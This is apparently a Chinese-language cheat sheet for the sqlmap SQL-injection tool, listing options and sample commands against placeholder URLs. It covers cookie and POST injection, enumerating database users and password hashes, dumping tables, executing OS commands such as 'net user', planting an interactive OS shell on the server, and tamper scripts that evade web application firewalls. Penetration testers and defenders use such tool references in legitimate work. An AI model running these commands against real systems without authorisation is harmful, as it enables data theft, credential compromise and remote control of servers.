-hh 获得详细帮助
-v 详细级别 0-6 默认为1
1.显示基本信息和警告信息
2.显示debug信息
3.显示注入的payload 建议使用
4.显示http请求
5.显示http响应
6.显示http响应页面
-d 直接连接数据库
-u 目标url
-r 从文件载入http请求 需要带绝对路径
Cookie 注入 sqlmap.py -u "www.xxxxxx.com" --cookie "id=1" -level 2 要将等级调为2才进行cookie 的测试
post 注入 sqlmap.py -u "www.xxxx.com" --data "id=1"
sqlmap.py -u "www.xxxx.com" --data "username=&passwd=" (像一些表单提交型的,直接抓包,查看提交参数,写给data)
sqlmap.py -r "请求数据包的文件 " -p "id 可测试的参数"
--users 枚举数据库管理系统用户
--password 枚举数据库管理密码
access数据库的注入(--tables 列表名 --columns 列字段 --dunmp 下载数据)
除access数据库的其他数据库( --is-dba 查看当前数据库的权限、 --dbs 查看所有数据库名、--users 所有数据库用户 、 --current-db 当前数据库名、current-user 当前数据库用户)
--os-cmd cmd执行操作系统命令 ( 列: sqlmap.py -u "wwww.xxxxxxx.com" --os-cmd="net user" 相当于执行net user 命令 )
--os-shell 相当于给服务器写交互式shell 退出时一定要quit() 要不退出时,会把shell留在服务器上
--random-agent 随机选定Http的user-Agernt
--proxy 使用代理连接到目标url
绕过WAF的tamper插件的使用:
sqlmap.py -u "www.xxxx.com" -tamper "脚本.py"
宽字节绕过 unmagicquotes.py
用 /**/分割sql关键字 randomcomments.py
注释绕过 versionedkeywords.py
将注入语句插入带指定位置 (针对静态注入)
sqlmap.py -u "www.xxxxxx.com/id/1*.html" *代表注入的位置